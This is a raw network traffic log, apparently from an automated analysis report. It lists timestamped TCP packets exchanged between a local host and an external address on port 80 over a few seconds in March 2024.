Mar 29, 2024 14:24:26.639581919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.639581919 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.640193939 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.640234947 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.640259027 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.640274048 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.649127960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.649189949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.649190903 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.649223089 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.851278067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.851295948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.851363897 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.851448059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.851495028 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.851526976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.851567984 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.851787090 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.851845980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.851851940 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.851886988 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.859631062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.859644890 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.859682083 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.859704971 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:26.859731913 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:26.859774113 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.059195042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.059240103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.059278965 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.059345007 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.059390068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.059390068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.059390068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.059426069 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.059906006 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.059954882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.059968948 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.060022116 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.067943096 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.068006039 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.068011045 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.068053961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.068114042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.068157911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.257009983 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.257095098 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.257141113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.257155895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.257179976 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.257208109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.257332087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.257390022 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.257466078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.257514000 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.265716076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.265732050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.265777111 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.266014099 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.266081095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.461819887 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.461884975 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.462049961 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.462050915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.462064028 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.462117910 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.470909119 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.470968962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.470984936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.471025944 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.471194029 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.471239090 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.471240044 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.471282959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.680963039 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.681022882 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.681070089 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.681250095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.681250095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.689770937 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.689785004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.689861059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.689986944 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.690042973 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.690076113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.690108061 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.690125942 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.690135956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.893738031 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.893789053 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.893815994 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.893836021 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.893865108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.893907070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.893917084 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.893954992 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.901947021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.902005911 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.902010918 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.902059078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.902148008 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.902184963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.902220964 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.902292013 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:27.902302980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:27.902348995 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.103811979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.103905916 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.103984118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.104011059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.104011059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.104047060 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.104054928 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.104108095 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.109925032 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.109980106 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.110011101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.110052109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.110090971 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.110135078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.110135078 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.110176086 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.110419035 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.110466957 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.110467911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.110503912 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.313966990 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.314057112 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.314069986 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.314158916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.314158916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.314158916 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.321083069 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.321155071 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.321161985 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.321208000 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.321209908 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.321245909 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.321268082 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.321302891 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.321727991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.321774006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.321810961 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.321852922 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.321862936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.321902037 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.534472942 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.534526110 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.534544945 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.534581900 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.534634113 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.534676075 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.543318987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.543370962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.543572903 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.543623924 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.543648958 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.543689013 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.543937922 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.543988943 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.544154882 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.544203043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.544264078 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.544307947 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.544364929 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.544435978 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.760656118 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.760858059 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.760900021 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.760915995 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.760972977 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.769875050 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.769968987 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.770173073 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.770215034 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.770225048 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.770260096 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.770947933 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.771004915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.771176100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.771192074 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.771212101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.771223068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.771245956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.771260023 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.986588001 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.986675978 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.986731052 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.986785889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.986785889 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.986963034 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.995404959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.995477915 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.995675087 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.995716095 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.995727062 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.995754004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.996418953 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.996465921 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.996479988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.996526003 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.996687889 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.996738911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:28.996762991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:28.996809006 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.216624975 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.216654062 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.216743946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.224291086 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.224312067 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.224375010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.224407911 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.224442959 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.224457979 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.224497080 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.225168943 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.225203991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.225218058 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.225244045 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.225392103 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.225410938 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.225439072 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.225451946 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.436620951 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.436640978 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.436728001 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.443445921 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.443459988 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.443537951 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.443779945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.443794012 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.443830013 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.443871021 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.444375992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.444395065 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.444434881 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.444467068 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.445449114 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.445466042 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.445502043 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.445516109 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.445570946 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.445609093 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.652597904 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.652615070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.652657986 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.652679920 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.658667088 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.658725023 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.658746004 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.658801079 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.658960104 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.658999920 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.659003973 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.659043074 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.659622908 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.659668922 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.659677982 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.659714937 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.660249949 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.660262108 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.660290956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.660311937 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.869580984 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.869891882 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.882097960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.882112980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.882169962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.882209063 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.887588024 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.887631893 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.887660980 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.887681007 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.887936115 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.887981892 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.887985945 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.888025999 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.888370037 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.888417959 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.888432980 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.888483047 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.889904976 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.889955044 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.890067101 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.890105963 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:29.890119076 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:29.890160084 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.080244064 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.080368996 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.091145992 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.091245890 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.095709085 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.095733881 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.095891953 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.095949888 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.095964909 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.096002102 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.096035004 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.096195936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.096242905 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.096242905 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.096283913 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.097775936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.097804070 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.097824097 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.097836018 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.098093987 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.098124027 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.098141909 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.098153114 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.287755966 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.287775040 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.287828922 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.287853956 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.297605991 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.297728062 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.302522898 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.302577019 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.302617073 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.302690983 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.302839994 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.302866936 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.302897930 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.302983046 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.303373098 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.303433895 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.303447962 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.303528070 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.305200100 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.305274010 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.305309057 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.305322886 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.305377960 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.305403948 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.305484056 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.527690887 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.527710915 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.527801991 CET	49699	80	192.168.2.7	89.238.170.230
Mar 29, 2024 14:24:30.532206059 CET	80	49699	89.238.170.230	192.168.2.7
Mar 29, 2024 14:24:30.532260895 CET	49699	80	192.168.2.7	89.238.170.230
